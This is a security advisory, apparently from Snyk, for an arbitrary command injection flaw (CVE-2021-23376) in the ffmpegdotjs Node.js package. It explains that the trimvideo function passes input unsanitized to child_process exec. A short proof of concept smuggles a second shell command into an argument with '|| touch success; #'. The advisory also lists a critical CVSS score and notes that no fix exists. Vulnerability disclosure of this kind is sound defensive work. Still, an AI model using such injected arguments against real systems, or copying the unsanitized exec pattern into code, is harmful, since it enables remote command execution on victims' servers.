Arbitrary Command Injection

Affecting ffmpegdotjs package, ALL versions

Report new vulnerabilities
Do your applications use this vulnerable package? Test your applications

Overview

ffmpegdotjs is a FFMPEG module for nodejs

Affected versions of this package are vulnerable to Arbitrary Command Injection. If attacker-controlled user input is given to the trimvideo function, it is possible for an attacker to execute arbitrary commands. This is due to use of the child_process exec function without input sanitization.

PoC (provided by reporter):

var ffmpegdotjs = require("ffmpegdotjs");

ffmpegdotjs.trimvideo("package-lock.json",0,30,"n || touch success; #").then((file)=>{
console.log(file);
});

(A file called success will be created as a result of the execution of touch success.)

Remediation

There is no fixed version for ffmpegdotjs.

References

CVSS Score

9.8
critical severity
  • Attack Vector
    Network
  • Attack Complexity
    Low
  • Privileges Required
    None
  • User Interaction
    None
  • Scope
    Unchanged
  • Confidentiality
    High
  • Integrity
    High
  • Availability
    High
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P
Credit
OmniTaint
CVE
CVE-2021-23376
CWE
CWE-77
Snyk ID
SNYK-JS-FFMPEGDOTJS-1078542
Disclosed
23 Feb, 2021
Published
18 Apr, 2021